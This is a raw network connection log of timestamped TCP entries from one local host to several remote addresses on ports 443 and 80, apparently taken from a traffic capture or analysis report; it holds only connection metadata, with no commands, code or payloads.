Nov 12, 2024 00:06:26.540919065 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.540981054 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.541851997 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.541980028 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.562661886 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.567532063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.578377962 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.578437090 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.578449011 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.578557014 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.578639030 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.578726053 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.583333015 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.583338976 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.590074062 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.590173960 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.590230942 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.590881109 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.591144085 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.591186047 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.593581915 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.593645096 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.593770027 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.602229118 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.602238894 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.602294922 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.602307081 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.602364063 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.604329109 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.604362965 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.652769089 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.652842999 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.652918100 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.653136969 CET	49830	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.653152943 CET	443	49830	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.658258915 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.658324003 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.658596039 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.671775103 CET	49825	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.671792030 CET	443	49825	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.671813965 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.671813965 CET	49826	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.671844006 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.671857119 CET	443	49826	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.673118114 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.673118114 CET	49827	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.673125982 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.673134089 CET	443	49827	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.673777103 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.673799992 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.673815966 CET	49824	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.673823118 CET	443	49824	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.674984932 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.675004959 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.675018072 CET	49828	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.675024986 CET	443	49828	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.685789108 CET	49829	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.685812950 CET	443	49829	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.693301916 CET	49832	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.693332911 CET	443	49832	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.693396091 CET	49832	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.694717884 CET	49832	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.694732904 CET	443	49832	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.697153091 CET	49833	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.697179079 CET	443	49833	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.697263956 CET	49833	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.697690010 CET	49833	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.697700977 CET	443	49833	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.701962948 CET	49834	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.701992989 CET	443	49834	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.702085972 CET	49834	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.703270912 CET	49835	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.703283072 CET	443	49835	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.703439951 CET	49835	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.705059052 CET	49836	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.705080032 CET	443	49836	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.705137968 CET	49836	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.706188917 CET	49834	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.706211090 CET	443	49834	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.706294060 CET	49835	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.706305981 CET	443	49835	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.707632065 CET	49836	443	192.168.2.5	13.107.246.45
Nov 12, 2024 00:06:26.707644939 CET	443	49836	13.107.246.45	192.168.2.5
Nov 12, 2024 00:06:26.721215010 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:26.721225023 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:26.721337080 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:26.721641064 CET	49837	443	192.168.2.5	142.251.40.129
Nov 12, 2024 00:06:26.721651077 CET	443	49837	142.251.40.129	192.168.2.5
Nov 12, 2024 00:06:26.740906000 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:26.740945101 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:26.741027117 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:26.741499901 CET	49838	443	192.168.2.5	20.189.173.13
Nov 12, 2024 00:06:26.741518021 CET	443	49838	20.189.173.13	192.168.2.5
Nov 12, 2024 00:06:26.742794991 CET	49839	443	192.168.2.5	20.110.205.119
Nov 12, 2024 00:06:26.742809057 CET	443	49839	20.110.205.119	192.168.2.5
Nov 12, 2024 00:06:26.742880106 CET	49839	443	192.168.2.5	20.110.205.119
Nov 12, 2024 00:06:26.743061066 CET	49839	443	192.168.2.5	20.110.205.119
Nov 12, 2024 00:06:26.743069887 CET	443	49839	20.110.205.119	192.168.2.5
Nov 12, 2024 00:06:26.762329102 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762412071 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762504101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762552023 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762614965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762626886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762660027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762686014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762727022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762753010 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762770891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762780905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762792110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762794018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762804985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762825012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762830019 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762839079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762849092 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762851000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762865067 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762866020 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762877941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762902975 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762928963 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762932062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762943983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762954950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762965918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762968063 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.762978077 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762990952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.762996912 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763003111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763020039 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763031960 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763031960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763045073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763051033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763061047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763073921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763084888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763103008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763114929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763132095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763143063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763153076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763159990 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763164997 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763175964 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763186932 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763191938 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763207912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763211012 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763221025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763230085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763232946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763245106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763253927 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763256073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763267040 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763278961 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763279915 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763290882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763302088 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763304949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763308048 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763328075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763339043 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763339996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763351917 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763366938 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763382912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763394117 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763408899 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763408899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763422966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763436079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763436079 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763449907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763456106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763465881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763475895 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763484955 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763497114 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763500929 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763508081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763519049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763526917 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763530970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763544083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763555050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763560057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763572931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763585091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763588905 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763596058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763609886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763611078 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763622046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763633013 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763636112 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763644934 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763653994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763657093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763667107 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763670921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763683081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763691902 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763695002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763709068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763710022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763722897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763732910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763740063 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763756037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763775110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763777018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763787031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763798952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763807058 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763809919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763827085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763828993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763840914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763856888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763859034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763869047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763880968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763890028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763891935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763906002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763907909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763921022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763922930 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763932943 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763945103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763957977 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.763962030 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763979912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763992071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.763995886 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764003992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764014959 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764014959 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764027119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764034033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764039993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764050961 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764051914 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764062881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764071941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764081001 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764084101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764096022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764105082 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764107943 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764117002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764126062 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764130116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764142036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764149904 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764159918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764167070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764168024 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764178038 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764190912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764203072 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764204979 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764214993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764240980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764254093 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764276028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764287949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764297009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764312029 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764314890 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764328003 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764334917 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764338970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.764359951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.764395952 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765209913 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765290022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765346050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765357971 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765367985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765382051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765393019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765403986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765408993 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765418053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765429974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765430927 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765443087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765454054 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765464067 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765484095 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765516996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765535116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765544891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765553951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765558958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765569925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765583992 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765585899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765593052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765614033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765624046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765635967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765645981 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765655994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765664101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765676022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765691996 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765702963 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765713930 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765713930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765727997 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765739918 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765739918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765753031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765762091 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765765905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765778065 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765789986 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765790939 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765801907 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765805006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765813112 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765824080 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765825033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765836954 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765847921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765853882 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765857935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765868902 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765880108 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765882969 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.765899897 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765917063 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.765934944 CET	80	49758	185.215.113.206	192.168.2.5
